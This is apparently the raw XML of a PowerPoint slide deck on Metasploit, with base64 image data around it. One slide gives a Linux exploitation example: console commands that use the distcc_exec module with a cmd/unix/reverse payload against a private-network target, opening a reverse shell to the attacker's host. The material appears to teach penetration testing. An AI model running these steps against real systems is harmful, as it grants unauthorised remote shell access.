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5734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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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7975" y="1143000"/>
            <a:ext cx="8181974" cy="5029200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Linux Exploitation Example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search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distcc_exec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/reverse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.20.23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.20.102</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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